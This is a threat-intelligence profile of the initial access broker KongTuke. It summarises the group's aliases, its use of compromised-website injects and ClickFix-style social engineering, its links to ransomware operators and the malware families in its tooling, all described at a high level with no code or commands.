KongTuke

KongTuke is a financially motivated initial access broker and traffic distribution system (TDS) active since at least 2024, also tracked as Woodgnat, 404 TDS, Chaya_002, LandUpdate808, and TAG-124. The reporting describes it as an access-broker service rather than a single malware family: it compromises legitimate, especially WordPress, websites, injects external JavaScript, and uses fake CAPTCHA, ClickFix, CrashFix, and FileFix-style social engineering to trick users into executing obfuscated PowerShell or other commands that fetch second-stage payloads. More recently, it has also used external Microsoft Teams chats while impersonating IT or help-desk staff to obtain persistent access to corporate networks in minutes. KongTuke has been linked to financially motivated intrusions against organizations in sectors including insurance, education, IT, professional services, industrial, legal, and energy, and reporting also ties its infrastructure to healthcare and other critical infrastructure targeting through downstream ransomware customers. Its business model is to compromise corporate networks and sell access to other criminals, including ransomware operators. Content directly links KongTuke-associated access or infrastructure to Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and AlphV/BlackCat. The actor’s tooling and delivery ecosystem includes ModeloRAT, a Python RAT/backdoor attributed to the group; Mistic, also tracked as MLTBackdoor, which Symantec and Carbon Black linked to KongTuke with low confidence; XorBee RAT; MintsLoader; D3F@ck Loader; Emmenhtal; Remcos; AsyncRAT; and Interlock RAT. ModeloRAT has been observed in ClickFix and Microsoft Teams social-engineering campaigns, while Mistic has been delivered via multi-stage ClickFix chains and uses DLL sideloading, in-memory execution, and self-deletion. Reporting also notes use of WinPython, Node.js, finger.exe, a fake NexShield browser extension, and the encrypted GateKeeper .NET payload. Observed tactics and techniques in the content include compromised-site web injects, SEO poisoning, TDS-based victim filtering and redirection, fake browser update and CAPTCHA lures, clipboard hijacking, paste-and-run execution, abuse of LOLBins such as PowerShell, curl, certutil, WMIC, net.exe, reg.exe, and finger.exe, DLL sideloading, in-memory payload execution, scheduled-task and Run-key persistence, anti-analysis checks, and victim profiling to distinguish standalone from domain-joined enterprise systems. Multiple reports describe KongTuke as operating broad, opportunistic campaigns and then assessing which footholds can be sold onward. The content also notes links between TAG-124/LandUpdate808 infrastructure and SocGholish, TA866/Asylum Ambuscade, and Interlock, but does not establish those as aliases or sub-groups of KongTuke.